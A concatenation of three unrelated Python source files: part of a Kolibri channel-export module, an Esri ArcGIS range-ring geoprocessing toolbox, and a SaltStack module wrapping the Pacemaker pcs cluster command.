Returns: base64 encoding of thumbnail
"""
if not channel.thumbnail or channel.thumbnail == '' or 'static' in channel.thumbnail:
return ""
if channel.thumbnail_encoding:
try:
thumbnail_data = channel.thumbnail_encoding
if thumbnail_data.get("base64"):
return thumbnail_data["base64"]
except ValueError:
logging.error("ERROR: channel thumbnail is not in correct format ({}: {})".format(channel.id, channel.thumbnail_encoding))
return get_thumbnail_encoding(channel.thumbnail)
def map_tags_to_node(kolibrinode, ccnode):
""" map_tags_to_node: assigns tags to nodes (creates fk relationship)
Args:
kolibrinode (kolibri.models.ContentNode): node to map tag to
ccnode (contentcuration.models.ContentNode): node with tags to map
Returns: None
"""
tags_to_add = []
for tag in ccnode.tags.all():
t, _new = kolibrimodels.ContentTag.objects.get_or_create(pk=tag.pk, tag_name=tag.tag_name)
tags_to_add.append(t)
kolibrinode.tags = tags_to_add
kolibrinode.save()
def prepare_export_database(tempdb):
call_command("flush", "--noinput", database=get_active_content_database()) # clears the db!
call_command("migrate",
"content",
run_syncdb=True,
database=get_active_content_database(),
noinput=True)
logging.info("Prepared the export database.")
def raise_if_nodes_are_all_unchanged(channel):
logging.debug("Checking if we have any changed nodes.")
changed_models = channel.main_tree.get_family().filter(changed=True)
if changed_models.count() == 0:
logging.debug("No nodes have been changed!")
raise EarlyExit(message="No models changed!", db_path=None)
logging.info("Some nodes are changed.")
def mark_all_nodes_as_changed(channel):
logging.debug("Marking all nodes as changed.")
channel.main_tree.get_family().update(changed=False, published=True)
logging.info("Marked all nodes as changed.")
def save_export_database(channel_id):
logging.debug("Saving export database")
current_export_db_location = get_active_content_database()
target_export_db_location = os.path.join(settings.DB_ROOT, "{id}.sqlite3".format(id=channel_id))
with open(current_export_db_location) as currentf:
storage.save(target_export_db_location, currentf)
logging.info("Successfully copied to {}".format(target_export_db_location))
def add_tokens_to_channel(channel):
if not channel.secret_tokens.filter(is_primary=True).exists():
logging.info("Generating tokens for the channel.")
channel.make_token()
def fill_published_fields(channel):
published_nodes = channel.main_tree.get_descendants().filter(published=True).prefetch_related('files')
channel.total_resource_count = published_nodes.exclude(kind_id=content_kinds.TOPIC).count()
channel.published_kind_count = json.dumps(list(published_nodes.values('kind_id').annotate(count=Count('kind_id')).order_by('kind_id')))
channel.published_size = published_nodes.values('files__checksum', 'files__file_size').distinct(
).aggregate(resource_size=Sum('files__file_size'))['resource_size'] or 0
node_languages = published_nodes.exclude(language=None).values_list('language', flat=True)
file_languages = published_nodes.values_list('files__language', flat=True)
language_list = list(set(chain(node_languages, file_languages)))
for lang in language_list:
if lang:
channel.included_languages.add(lang)
channel.save()
| |
# coding: utf-8
'''
------------------------------------------------------------------------------
Copyright 2018 Esri
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------------------------------------------
==================================================
DistanceAndDirectionTools.py
--------------------------------------------------
requirements: ArcGIS 10.3.1+, ArcGIS Pro 1.4+, Python 2.7 or Python 3.5+
author: ArcGIS Solutions
contact: support@esri.com
company: Esri
==================================================
description:
Distance and Direction Toolset Tools
==================================================
'''
import os
import sys
import arcpy
try:
from . import RangeRingUtils
except ImportError:
import RangeRingUtils
# ----------------------------------------------------------------------------------
# RangeRingsFromInterval Tool
# ----------------------------------------------------------------------------------
class RangeRingsFromInterval(object):
def __init__(self):
self.label = u'Range Rings From Interval'
self.description = u'Create a concentric circle from a center, with a number of rings, and the distance between rings.'
self.category = u'Distance and Direction'
self.canRunInBackground = False
def getParameterInfo(self):
# Input_Center_Features
param_1 = arcpy.Parameter()
param_1.name = u'Input_Center_Features'
param_1.displayName = u'Input Center Features'
param_1.parameterType = 'Required'
param_1.direction = 'Input'
param_1.datatype = u'Feature Set' # Same as u'GPFeatureRecordSetLayer'
# Set the Feature Set schema
input_layer_file_path = os.path.join(os.path.dirname(os.path.dirname(__file__)),
"layers",
"RangeRingInputObserversGDB.lyr")
param_1.value = input_layer_file_path
# Number_of_Rings
param_2 = arcpy.Parameter()
param_2.name = u'Number_of_Rings'
param_2.displayName = u'Number of Rings'
param_2.parameterType = 'Required'
param_2.direction = 'Input'
param_2.datatype = u'Long'
param_2.value = u'4'
# Interval_Between_Rings
param_3 = arcpy.Parameter()
param_3.name = u'Interval_Between_Rings'
param_3.displayName = u'Interval Between Rings'
param_3.parameterType = 'Required'
param_3.direction = 'Input'
param_3.datatype = u'Double'
param_3.value = u'100'
# Distance_Units
param_4 = arcpy.Parameter()
param_4.name = u'Distance_Units'
param_4.displayName = u'Distance Units'
param_4.parameterType = 'Required'
param_4.direction = 'Input'
param_4.datatype = u'String'
param_4.value = u'METERS'
param_4.filter.list = [u'METERS', u'KILOMETERS', u'MILES', u'NAUTICAL_MILES', u'FEET', u'US_SURVEY_FEET']
# Number_of_Radials
param_5 = arcpy.Parameter()
param_5.name = u'Number_of_Radials'
param_5.displayName = u'Number of Radials'
param_5.parameterType = 'Required'
param_5.direction = 'Input'
param_5.datatype = u'Long'
param_5.value = u'8'
# Output_Ring_Features
param_6 = arcpy.Parameter()
param_6.name = u'Output_Ring_Features'
param_6.displayName = u'Output Ring Features'
param_6.parameterType = 'Required'
param_6.direction = 'Output'
param_6.datatype = u'Feature Class'
param_6.value = u'%scratchGDB%\\Rings'
param_6.symbology = os.path.join(os.path.dirname(os.path.dirname(__file__)),
"layers", "RangeRings.lyr")
# Output_Radial_Features
param_7 = arcpy.Parameter()
param_7.name = u'Output_Radial_Features'
param_7.displayName = u'Output Radial Features'
param_7.parameterType = 'Required'
param_7.direction = 'Output'
param_7.datatype = u'Feature Class'
param_7.value = u'%scratchGDB%\\Radials'
param_7.symbology = os.path.join(os.path.dirname(os.path.dirname(__file__)),
"layers", "RangeRadials.lyr")
# Spatial_Reference
param_8 = arcpy.Parameter()
param_8.name = u'Spatial_Reference'
param_8.displayName = u'Spatial Reference'
param_8.parameterType = 'Optional'
param_8.direction = 'Input'
param_8.datatype = u'Spatial Reference'
return [param_1, param_2, param_3, param_4, param_5, param_6, param_7, param_8]
def isLicensed(self):
return True
def updateParameters(self, parameters):
validator = getattr(self, 'ToolValidator', None)
if validator:
return validator(parameters).updateParameters()
def updateMessages(self, parameters):
validator = getattr(self, 'ToolValidator', None)
if validator:
return validator(parameters).updateMessages()
def execute(self, parameters, messages):
inputCenterFeatures = parameters[0].valueAsText
inputNumberOfRings = parameters[1].value
inputDistanceBetween = parameters[2].value
inputDistanceUnits = parameters[3].value
inputNumberOfRadials = parameters[4].value
outputRingFeatures = parameters[5].valueAsText
outputRadialFeatures = parameters[6].valueAsText
optionalSpatialReference = parameters[7].value
optionalSpatialReferenceAsText = parameters[7].valueAsText
if optionalSpatialReferenceAsText == "#" or optionalSpatialReferenceAsText == "":
optionalSpatialReference = None
# WORKAROUND (for Pro): clear layer selection (since last point is selected)
# So tool will work on all points entered
featureSetDescribe = arcpy.Describe(inputCenterFeatures)
if sys.version_info >= (3, 0) and (featureSetDescribe.dataType == "FeatureLayer"):
arcpy.SelectLayerByAttribute_management(inputCenterFeatures, "CLEAR_SELECTION")
# get/set environment
arcpy.env.overwriteOutput = True
# Call tool method
rr = RangeRingUtils.rangeRingsFromInterval(inputCenterFeatures,
inputNumberOfRings,
inputDistanceBetween,
inputDistanceUnits,
inputNumberOfRadials,
outputRingFeatures,
outputRadialFeatures,
optionalSpatialReference)
# Set output
return rr[0], rr[1]
# ----------------------------------------------------------------------------------
# RangeRingFromMinimumAndMaximum Tool
# ----------------------------------------------------------------------------------
class RangeRingFromMinimumAndMaximum(object):
def __init__(self):
self.label = u'Range Rings From Minimum And Maximum'
self.description = u'Create a concentric circle from a center with two rings depicting a minimum range and a maximum range.'
self.category = u'Distance and Direction'
self.canRunInBackground = False
def getParameterInfo(self):
# Input_Center_Features
param_1 = arcpy.Parameter()
param_1.name = u'Input_Center_Features'
param_1.displayName = u'Input Center Features'
param_1.parameterType = 'Required'
param_1.direction = 'Input'
param_1.datatype = u'Feature Set'
# Set the Feature Set schema
input_layer_file_path = os.path.join(os.path.dirname(os.path.dirname(__file__)),
"layers",
"RangeRingInputObserversGDB.lyr")
param_1.value = input_layer_file_path
# Minimum_Range
param_2 = arcpy.Parameter()
param_2.name = u'Minimum_Range'
param_2.displayName = u'Minimum Range'
param_2.parameterType = 'Required'
param_2.direction = 'Input'
param_2.datatype = u'Double'
param_2.value = u'10'
# Maximum_Range
param_3 = arcpy.Parameter()
param_3.name = u'Maximum_Range'
param_3.displayName = u'Maximum Range'
param_3.parameterType = 'Required'
param_3.direction = 'Input'
param_3.datatype = u'Double'
param_3.value = u'100'
# Distance_Units
param_4 = arcpy.Parameter()
param_4.name = u'Distance_Units'
param_4.displayName = u'Distance Units'
param_4.parameterType = 'Required'
param_4.direction = 'Input'
param_4.datatype = u'String'
param_4.value = u'METERS'
param_4.filter.list = [u'METERS', u'KILOMETERS', u'MILES', u'NAUTICAL_MILES', u'FEET', u'US_SURVEY_FEET']
# Number_of_Radials
param_5 = arcpy.Parameter()
param_5.name = u'Number_of_Radials'
param_5.displayName = u'Number of Radials'
param_5.parameterType = 'Required'
param_5.direction = 'Input'
param_5.datatype = u'Long'
param_5.value = u'8'
# Output_Ring_Features
param_6 = arcpy.Parameter()
param_6.name = u'Output_Ring_Features'
param_6.displayName = u'Output Ring Features'
param_6.parameterType = 'Required'
param_6.direction = 'Output'
param_6.datatype = u'Feature Class'
param_6.value = u'%scratchGDB%\\rings'
param_6.symbology = os.path.join(os.path.dirname(os.path.dirname(__file__)),
"layers", "RangeRings.lyr")
# Output_Radial_Features
param_7 = arcpy.Parameter()
param_7.name = u'Output_Radial_Features'
param_7.displayName = u'Output Radial Features'
param_7.parameterType = 'Required'
param_7.direction = 'Output'
param_7.datatype = u'Feature Class'
param_7.value = u'%scratchGDB%\\radials'
param_7.symbology = os.path.join(os.path.dirname(os.path.dirname(__file__)),
"layers", "RangeRadials.lyr")
# Spatial_Reference
param_8 = arcpy.Parameter()
param_8.name = u'Spatial_Reference'
param_8.displayName = u'Spatial Reference'
param_8.parameterType = 'Optional'
param_8.direction = 'Input'
param_8.datatype = u'Spatial Reference'
return [param_1, param_2, param_3, param_4, param_5, param_6, param_7, param_8]
def isLicensed(self):
return True
def updateParameters(self, parameters):
validator = getattr(self, 'ToolValidator', None)
if validator:
return validator(parameters).updateParameters()
def updateMessages(self, parameters):
validator = getattr(self, 'ToolValidator', None)
if validator:
return validator(parameters).updateMessages()
def execute(self, parameters, messages):
inputCenterFeatures = parameters[0].valueAsText
inputMinimumRange = parameters[1].value
inputMaximumRange = parameters[2].value
inputDistanceUnits = parameters[3].value
inputNumberOfRadials = parameters[4].value
outputRingFeatures = parameters[5].valueAsText
outputRadialFeatures = parameters[6].valueAsText
optionalSpatialReference = parameters[7].value
optionalSpatialReferenceAsText = parameters[7].valueAsText
if optionalSpatialReferenceAsText == "#" or optionalSpatialReferenceAsText == "":
optionalSpatialReference = None
# WORKAROUND (for Pro): clear layer selection (since last point is selected)
# So tool will work on all points entered
featureSetDescribe = arcpy.Describe(inputCenterFeatures)
if sys.version_info >= (3, 0) and (featureSetDescribe.dataType == "FeatureLayer"):
arcpy.SelectLayerByAttribute_management(inputCenterFeatures, "CLEAR_SELECTION")
rr = RangeRingUtils.rangeRingsFromMinMax(inputCenterFeatures,
inputMinimumRange,
inputMaximumRange,
inputDistanceUnits,
inputNumberOfRadials,
outputRingFeatures,
outputRadialFeatures,
optionalSpatialReference)
# Set output
return rr[0], rr[1]
# ----------------------------------------------------------------------------------
# RangeRingsFromMinAndMaxTable Tool
# ----------------------------------------------------------------------------------
class RangeRingsFromMinAndMaxTable(object):
class ToolValidator(object):
"""Class for validating a tool's parameter values and controlling
the behavior of the tool's dialog."""
def __init__(self, parameters):
"""Setup arcpy and the list of tool parameters."""
self.params = parameters
def initializeParameters(self):
"""Refine the properties of a tool's parameters. This method is
called when the tool is opened."""
# Input Center Features (Feature Set) [0]
# Input Table (Table) [1]
# Selected Type (String) [2]
# Number of Radials (Long) [3]
# Output Ring Features (Feature Class) [4]
# Output Radial Features (Feature Class) [5]
# Spatial Reference (Spatial Reference) [6]
# Input Table Type Name Field (Field) [7]
# Input Table Minimum Range Field (Field) [8]
# Input Table Maximum Range Field (Field) [9]
inputParamsTable = os.path.join(os.path.dirname(os.path.dirname(__file__)),
"tooldata", "RangeRings.gdb", "rrInputTable")
self.params[1].value = inputParamsTable
# Get list of type names from InputTable [1]
typeNames = self.updateTypes(str(self.params[1].value))
self.params[2].filter.list = typeNames
self.params[2].value = typeNames[0]
return
def updateParameters(self):
"""Modify the values and properties of parameters before internal
validation is performed. This method is called whenever a parameter
has been changed."""
if self.params[1].altered:
# Update list of type names from Input Table [1]
self.params[2].filter.list = self.updateTypes(str(self.params[1].value))
return
def updateMessages(self):
"""Modify the messages created by internal validation for each tool
parameter. This method is called after internal validation."""
return
def updateTypes(self,inputTable):
# Make a list of 'name' field from the input table
Names = []
try:
tableRows = arcpy.da.SearchCursor(inputTable,["Name"])
for row in tableRows:
name = str(row[0])
Names.append(name)
del tableRows
except:
msg = r"ERROR LOADING INPUT TABLE!!"
Names.append(msg)
messages.AddErrorMessage(msg)
return Names
def __init__(self):
self.label = u'Range Rings From Minimum And Maximum Table'
self.description = u'Create a concentric circle from a center with two rings depicting a minimum range and a maximum range from a table.'
self.category = u'Distance and Direction'
self.canRunInBackground = False
def getParameterInfo(self):
# Input_Center_Features
param_1 = arcpy.Parameter()
param_1.name = u'Input_Center_Features'
param_1.displayName = u'Input Center Features'
param_1.parameterType = 'Required'
param_1.direction = 'Input'
param_1.datatype = u'Feature Set'
# Set the Feature Set schema
input_layer_file_path = os.path.join(os.path.dirname(os.path.dirname(__file__)),
"layers",
"RangeRingInputObserversGDB.lyr")
param_1.value = input_layer_file_path
# Input_Table
param_2 = arcpy.Parameter()
param_2.name = u'Input_Table'
param_2.displayName = u'Input Table'
param_2.parameterType = 'Required'
param_2.direction = 'Input'
param_2.datatype = u'Table'
# military-tools-geoprocessing-toolbox\\toolboxes\\tooldata\\Range
# Rings.gdb\\rrInputTable'
param_2.value = os.path.join(os.path.dirname(os.path.dirname(__file__)),
"tooldata", "RangeRings.gdb", "rrInputTable")
# Selected_Type
param_3 = arcpy.Parameter()
param_3.name = u'Selected_Type'
param_3.displayName = u'Selected Type'
param_3.parameterType = 'Required'
param_3.direction = 'Input'
param_3.datatype = u'String'
param_3.value = u'M4'
param_3.filter.list = [u'M4', u'M249']
# Number_Of_Radials
param_4 = arcpy.Parameter()
param_4.name = u'Number_Of_Radials'
param_4.displayName = u'Number Of Radials'
param_4.parameterType = 'Required'
param_4.direction = 'Input'
param_4.datatype = u'Long'
param_4.value = u'8'
# Output_Ring_Features
param_5 = arcpy.Parameter()
param_5.name = u'Output_Ring_Features'
param_5.displayName = u'Output Ring Features'
param_5.parameterType = 'Required'
param_5.direction = 'Output'
param_5.datatype = u'Feature Class'
param_5.value = u'%scratchGDB%\\Rings'
param_5.symbology = os.path.join(os.path.dirname(os.path.dirname(__file__)),
"layers", "RangeRings.lyr")
# Output_Radial_Features
param_6 = arcpy.Parameter()
param_6.name = u'Output_Radial_Features'
param_6.displayName = u'Output Radial Features'
param_6.parameterType = 'Required'
param_6.direction = 'Output'
param_6.datatype = u'Feature Class'
param_6.value = u'%scratchGDB%\\Radials'
param_6.symbology = os.path.join(os.path.dirname(os.path.dirname(__file__)),
"layers", "RangeRadials.lyr")
# Spatial_Reference
param_7 = arcpy.Parameter()
param_7.name = u'Spatial_Reference'
param_7.displayName = u'Spatial Reference'
param_7.parameterType = 'Optional'
param_7.direction = 'Input'
param_7.datatype = u'Spatial Reference'
# Input_Table_Type_Name_Field
param_8 = arcpy.Parameter()
param_8.name = u'Input_Table_Type_Name_Field'
param_8.displayName = u'Input Table Type Name Field'
param_8.parameterType = 'Optional'
param_8.direction = 'Input'
param_8.datatype = u'Field'
param_8.value = u'Name'
param_8.parameterDependencies = ["Input_Table"]
param_8.category = "Input Table Options"
# Input_Table_Minimum_Range_Field
param_9 = arcpy.Parameter()
param_9.name = u'Input_Table_Minimum_Range_Field'
param_9.displayName = u'Input Table Minimum Range Field'
param_9.parameterType = 'Optional'
param_9.direction = 'Input'
param_9.datatype = u'Field'
param_9.value = u'Min'
param_9.parameterDependencies = ["Input_Table"]
param_9.category = "Input Table Options"
# Input_Table_Maximum_Range_Field
param_10 = arcpy.Parameter()
param_10.name = u'Input_Table_Maximum_Range_Field'
param_10.displayName = u'Input Table Maximum Range Field'
param_10.parameterType = 'Optional'
param_10.direction = 'Input'
param_10.datatype = u'Field'
param_10.value = u'Max'
param_10.parameterDependencies = ["Input_Table"]
param_10.category = "Input Table Options"
return [param_1, param_2, param_3, param_4, param_5, param_6, param_7, param_8, param_9, param_10]
def isLicensed(self):
return True
def updateParameters(self, parameters):
validator = getattr(self, 'ToolValidator', None)
if validator:
return validator(parameters).updateParameters()
def updateMessages(self, parameters):
validator = getattr(self, 'ToolValidator', None)
if validator:
return validator(parameters).updateMessages()
def execute(self, parameters, messages):
inputCenterFeatures = parameters[0].valueAsText
inputTable = parameters[1].valueAsText
inputSelectedType = parameters[2].value
inputNumberOfRadials = parameters[3].value
outputRingFeatures = parameters[4].valueAsText
outputRadialFeatures = parameters[5].valueAsText
optionalSpatialReference = parameters[6].value
optionalSpatialReferenceAsText = parameters[6].valueAsText
if optionalSpatialReferenceAsText == "#" or optionalSpatialReferenceAsText == '':
optionalSpatialReference = None
# WORKAROUND (for Pro): clear layer selection (since last point is selected)
# So tool will work on all points entered
featureSetDescribe = arcpy.Describe(inputCenterFeatures)
if sys.version_info >= (3, 0) and (featureSetDescribe.dataType == "FeatureLayer"):
arcpy.SelectLayerByAttribute_management(inputCenterFeatures, "CLEAR_SELECTION")
#Weapon Table Options
if (len(parameters) > 7) :
inputTypeNameField = parameters[7].valueAsText
if (len(parameters) > 8) :
inputTypeMinRangeField = parameters[8].valueAsText
if (len(parameters) > 9) :
inputTypeMaxRangeField = parameters[9].valueAsText
if inputTypeNameField != "#" and inputTypeNameField != "" and \
inputTypeMinRangeField != "#" and inputTypeMinRangeField != "" and \
inputTypeMaxRangeField != "#" and inputTypeMaxRangeField != "" :
#get min and max range for selected weapon
cursorFields = [inputTypeNameField, inputTypeMinRangeField, inputTypeMaxRangeField]
with arcpy.da.SearchCursor(inputTable, cursorFields) as cursor:
for row in cursor:
if str(inputSelectedType) == str(row[0]):
inputMinimumRange = row[1]
inputMaximumRange = row[2]
# get/set environment
arcpy.env.overwriteOutput = True
# Call tool method
rr = RangeRingUtils.rangeRingsFromMinMax(inputCenterFeatures,
inputMinimumRange,
inputMaximumRange,
"METERS",
inputNumberOfRadials,
outputRingFeatures,
outputRadialFeatures,
optionalSpatialReference)
# Set output
return rr[0], rr[1]
| |
"""
Configure a Pacemaker/Corosync cluster with PCS
===============================================
Configure Pacemaker/Cororsync clusters with the
Pacemaker/Cororsync conifguration system (PCS)
:depends: pcs
.. versionadded:: 2016.3.0
"""
import logging
import salt.utils.path
log = logging.getLogger(__name__)
def __virtual__():
"""
Only load if pcs package is installed
"""
if salt.utils.path.which("pcs"):
return "pcs"
return (False, "Missing dependency: pcs")
def __use_new_commands():
"""
The command line arguments of pcs changed after version 0.10
This will return True if the new arguments are needed and
false if the old ones are needed
"""
pcs_version = __salt__["pkg.version"]("pcs")
log.debug("PCS package version %s", pcs_version)
if __salt__["pkg.version_cmp"](pcs_version, "0.10") == 1:
log.debug("New version, new command")
return True
else:
log.debug("Old Version")
return False
def item_show(
item, item_id=None, item_type=None, show="show", extra_args=None, cibfile=None
):
"""
Show an item via pcs command
(mainly for use with the pcs state module)
item
config, property, resource, constraint etc.
item_id
id of the item
item_type
item type
show
show command (probably None, default: show or status for newer implementation)
extra_args
additional options for the pcs command
cibfile
use cibfile instead of the live CIB
"""
new_commands = __use_new_commands()
cmd = ["pcs"]
if isinstance(cibfile, str):
cmd += ["-f", cibfile]
if isinstance(item, str):
cmd += [item]
elif isinstance(item, (list, tuple)):
cmd += item
# constraint command follows a different order
if item in ["constraint"]:
cmd += [item_type]
# New implementions use config instead of show. This resolves that issue.
if new_commands and (
item != "config" and item != "constraint" and item != "property"
):
if show == "show":
show = "config"
elif isinstance(show, (list, tuple)):
for index, value in enumerate(show):
if show[index] == "show":
show[index] = "config"
if isinstance(show, str):
cmd += [show]
elif isinstance(show, (list, tuple)):
cmd += show
if isinstance(item_id, str):
cmd += [item_id]
if isinstance(extra_args, (list, tuple)):
cmd += extra_args
# constraint command only shows id, when using '--full'-parameter
if item in ["constraint"]:
if not isinstance(extra_args, (list, tuple)) or "--full" not in extra_args:
cmd += ["--full"]
log.debug("Running item show %s", cmd)
return __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
def item_create(
item, item_id, item_type, create="create", extra_args=None, cibfile=None
):
"""
Create an item via pcs command
(mainly for use with the pcs state module)
item
config, property, resource, constraint etc.
item_id
id of the item
item_type
item type
create
create command (create or set f.e., default: create)
extra_args
additional options for the pcs command
cibfile
use cibfile instead of the live CIB
"""
cmd = ["pcs"]
if isinstance(cibfile, str):
cmd += ["-f", cibfile]
if isinstance(item, str):
cmd += [item]
elif isinstance(item, (list, tuple)):
cmd += item
# constraint command follows a different order
if item in ["constraint"]:
if isinstance(item_type, str):
cmd += [item_type]
if isinstance(create, str):
cmd += [create]
elif isinstance(create, (list, tuple)):
cmd += create
# constraint command needs item_id in format 'id=<id' after all params
# constraint command follows a different order
if item not in ["constraint"]:
cmd += [item_id]
if isinstance(item_type, str):
cmd += [item_type]
if isinstance(extra_args, (list, tuple)):
# constraint command needs item_id in format 'id=<id' after all params
if item in ["constraint"]:
extra_args = extra_args + ["id={}".format(item_id)]
cmd += extra_args
return __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
def auth(nodes, pcsuser="hacluster", pcspasswd="hacluster", extra_args=None):
"""
Authorize nodes to the cluster
nodes
a list of nodes which should be authorized to the cluster
pcsuser
user for communitcation with PCS (default: hacluster)
pcspasswd
password for pcsuser (default: hacluster)
extra_args
list of extra option for the \'pcs cluster auth\' command. The newer cluster host command has no extra args and so will ignore it.
CLI Example:
.. code-block:: bash
salt '*' pcs.auth nodes='[ node1.example.org node2.example.org ]' pcsuser=hacluster pcspasswd=hoonetorg extra_args=[ '--force' ]
"""
if __use_new_commands():
cmd = ["pcs", "host", "auth"]
else:
cmd = ["pcs", "cluster", "auth"]
cmd.extend(["-u", pcsuser, "-p", pcspasswd])
if not __use_new_commands() and isinstance(extra_args, (list, tuple)):
cmd += extra_args
cmd += nodes
return __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
def is_auth(nodes, pcsuser="hacluster", pcspasswd="hacluster"):
"""
Check if nodes are already authorized
nodes
a list of nodes to be checked for authorization to the cluster
pcsuser
user for communitcation with PCS (default: hacluster)
pcspasswd
password for pcsuser (default: hacluster)
CLI Example:
.. code-block:: bash
salt '*' pcs.is_auth nodes='[node1.example.org node2.example.org]' pcsuser=hacluster pcspasswd=hoonetorg
"""
if __use_new_commands():
cmd = ["pcs", "host", "auth", "-u", pcsuser, "-p", pcspasswd]
else:
cmd = ["pcs", "cluster", "auth"]
cmd += nodes
return __salt__["cmd.run_all"](
cmd, stdin="\n\n", output_loglevel="trace", python_shell=False
)
def cluster_setup(nodes, pcsclustername="pcscluster", extra_args=None):
"""
Setup pacemaker cluster via pcs command
nodes
a list of nodes which should be set up
pcsclustername
Name of the Pacemaker cluster (default: pcscluster)
extra_args
list of extra option for the \'pcs cluster setup\' command
CLI Example:
.. code-block:: bash
salt '*' pcs.cluster_setup nodes='[ node1.example.org node2.example.org ]' pcsclustername=pcscluster
"""
cmd = ["pcs", "cluster", "setup"]
if __use_new_commands():
cmd += [pcsclustername]
else:
cmd += ["--name", pcsclustername]
cmd += nodes
if isinstance(extra_args, (list, tuple)):
cmd += extra_args
log.debug("Running cluster setup: %s", cmd)
return __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
def cluster_destroy(extra_args=None):
"""
Destroy corosync cluster using the pcs command
extra_args
list of extra option for the \'pcs cluster destroy\' command (only really --all)
CLI Example:
.. code-block:: bash
salt '*' pcs.cluster_destroy extra_args=--all
"""
cmd = ["pcs", "cluster", "destroy"]
if isinstance(extra_args, (list, tuple)):
cmd += extra_args
log.debug("Running cluster destroy: %s", cmd)
return __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
def cluster_node_add(node, extra_args=None):
"""
Add a node to the pacemaker cluster via pcs command
node
node that should be added
extra_args
list of extra option for the \'pcs cluster node add\' command
CLI Example:
.. code-block:: bash
salt '*' pcs.cluster_node_add node=node2.example.org
"""
cmd = ["pcs", "cluster", "node", "add"]
cmd += [node]
if isinstance(extra_args, (list, tuple)):
cmd += extra_args
return __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
def cib_create(cibfile, scope="configuration", extra_args=None):
"""
Create a CIB-file from the current CIB of the cluster
cibfile
name/path of the file containing the CIB
scope
specific section of the CIB (default: configuration)
extra_args
additional options for creating the CIB-file
CLI Example:
.. code-block:: bash
salt '*' pcs.cib_create cibfile='/tmp/VIP_apache_1.cib' scope=False
"""
cmd = ["pcs", "cluster", "cib", cibfile]
if isinstance(scope, str):
cmd += ["scope={}".format(scope)]
if isinstance(extra_args, (list, tuple)):
cmd += extra_args
return __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
def cib_push(cibfile, scope="configuration", extra_args=None):
"""
Push a CIB-file as the new CIB to the cluster
cibfile
name/path of the file containing the CIB
scope
specific section of the CIB (default: configuration)
extra_args
additional options for creating the CIB-file
CLI Example:
.. code-block:: bash
salt '*' pcs.cib_push cibfile='/tmp/VIP_apache_1.cib' scope=False
"""
cmd = ["pcs", "cluster", "cib-push", cibfile]
if isinstance(scope, str):
cmd += ["scope={}".format(scope)]
if isinstance(extra_args, (list, tuple)):
cmd += extra_args
return __salt__["cmd.run_all"](cmd, output_loglevel="trace", python_shell=False)
def config_show(cibfile=None):
"""
Show config of cluster
cibfile
name/path of the file containing the CIB
CLI Example:
.. code-block:: bash
salt '*' pcs.config_show cibfile='/tmp/cib_for_galera'
"""
return item_show(item="config", item_id=None, extra_args=None, cibfile=cibfile)
def prop_show(prop, extra_args=None, cibfile=None):
"""
Show the value of a cluster property
prop
name of the property
extra_args
additional options for the pcs property command
cibfile
use cibfile instead of the live CIB
CLI Example:
.. code-block:: bash
salt '*' pcs.prop_show cibfile='/tmp/2_node_cluster.cib' prop='no-quorum-policy' cibfile='/tmp/2_node_cluster.cib'
"""
return item_show(
item="property", item_id=prop, extra_args=extra_args, cibfile=cibfile
)
def prop_set(prop, value, extra_args=None, cibfile=None):
"""
Set the value of a cluster property
prop
name of the property
value
value of the property prop
extra_args
additional options for the pcs property command
cibfile
use cibfile instead of the live CIB
CLI Example:
.. code-block:: bash
salt '*' pcs.prop_set prop='no-quorum-policy' value='ignore' cibfile='/tmp/2_node_cluster.cib'
"""
return item_create(
item="property",
item_id="{}={}".format(prop, value),
item_type=None,
create="set",
extra_args=extra_args,
cibfile=cibfile,
)
def stonith_show(stonith_id, extra_args=None, cibfile=None):
"""
Show the value of a cluster stonith
stonith_id
name for the stonith resource
extra_args
additional options for the pcs stonith command
cibfile
use cibfile instead of the live CIB
CLI Example:
.. code-block:: bash
salt '*' pcs.stonith_show stonith_id='eps_fence' cibfile='/tmp/2_node_cluster.cib'
"""
return item_show(
item="stonith", item_id=stonith_id, extra_args=extra_args, cibfile=cibfile
)
def stonith_create(
stonith_id, stonith_device_type, stonith_device_options=None, cibfile=None
):
"""
Create a stonith resource via pcs command
stonith_id
name for the stonith resource
stonith_device_type
name of the stonith agent fence_eps, fence_xvm f.e.
stonith_device_options
additional options for creating the stonith resource
cibfile
use cibfile instead of the live CIB for manipulation
CLI Example:
.. code-block:: bash
salt '*' pcs.stonith_create stonith_id='eps_fence' stonith_device_type='fence_eps'
stonith_device_options="['pcmk_host_map=node1.example.org:01;node2.example.org:02', 'ipaddr=myepsdevice.example.org', 'action=reboot', 'power_wait=5', 'verbose=1', 'debug=/var/log/pcsd/eps_fence.log', 'login=hidden', 'passwd=hoonetorg']" cibfile='/tmp/cib_for_stonith.cib'
"""
return item_create(
item="stonith",
item_id=stonith_id,
item_type=stonith_device_type,
extra_args=stonith_device_options,
cibfile=cibfile,
)
def resource_show(resource_id, extra_args=None, cibfile=None):
"""
Show a resource via pcs command
resource_id
name of the resource
extra_args
additional options for the pcs command
cibfile
use cibfile instead of the live CIB
CLI Example:
.. code-block:: bash
salt '*' pcs.resource_show resource_id='galera' cibfile='/tmp/cib_for_galera.cib'
"""
return item_show(
item="resource", item_id=resource_id, extra_args=extra_args, cibfile=cibfile
)
def resource_create(resource_id, resource_type, resource_options=None, cibfile=None):
"""
Create a resource via pcs command
resource_id
name for the resource
resource_type
resource type (f.e. ocf:heartbeat:IPaddr2 or VirtualIP)
resource_options
additional options for creating the resource
cibfile
use cibfile instead of the live CIB for manipulation
CLI Example:
.. code-block:: bash
salt '*' pcs.resource_create resource_id='galera' resource_type='ocf:heartbeat:galera' resource_options="['wsrep_cluster_address=gcomm://node1.example.org,node2.example.org,node3.example.org', '--master']" cibfile='/tmp/cib_for_galera.cib'
"""
return item_create(
item="resource",
item_id=resource_id,
item_type=resource_type,
extra_args=resource_options,
cibfile=cibfile,
)
| |
#encoding: utf-8
